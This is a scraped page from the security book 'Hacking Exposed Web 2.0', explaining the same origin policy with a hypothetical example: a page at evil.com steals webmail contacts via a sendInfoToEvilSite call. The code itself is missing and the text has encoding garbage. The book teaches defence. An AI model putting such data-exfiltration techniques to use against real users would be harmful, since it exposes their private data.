Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions

Prev | Current Page 79 | Next

Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"

Finally, it calls sendInfoToEvilSite(callbackFunction()) after 1.5
Chapter 2: Cross-Site Scripting 25
seconds??”a generous amount of time for the browser to make the request to somesite.
com. Therefore, you should not extend document.domain for other purposes.
What Happens if the Same Origin Policy Is Broken?
The same origin policy ensures that an ???evil??? web site cannot access other web sites, but
what if the same origin policy was broken or not there at all? What could an attacker do?
Let??™s consider one hypothetical example.
Suppose that an attacker made a web page at http://www.evil.com/index.html that
could read HTTP responses from another domain, such as a webmail application, and the
attacker was able to lure the webmail users to http://www.evil.com/index.html. Then
the attacker would be able to read the contacts of the lured users. This would be done
with the following JavaScript in http://www.evil.com/index.html:

All your contacts are belong to us.

Pages:
67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91

After the Rain : how the West lost the East (page 172) A History of Indian Philosophy, Volume 1 (page 117) The Adventures of Tom Sawyer, Part 3. (page 9)

Books for you

Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"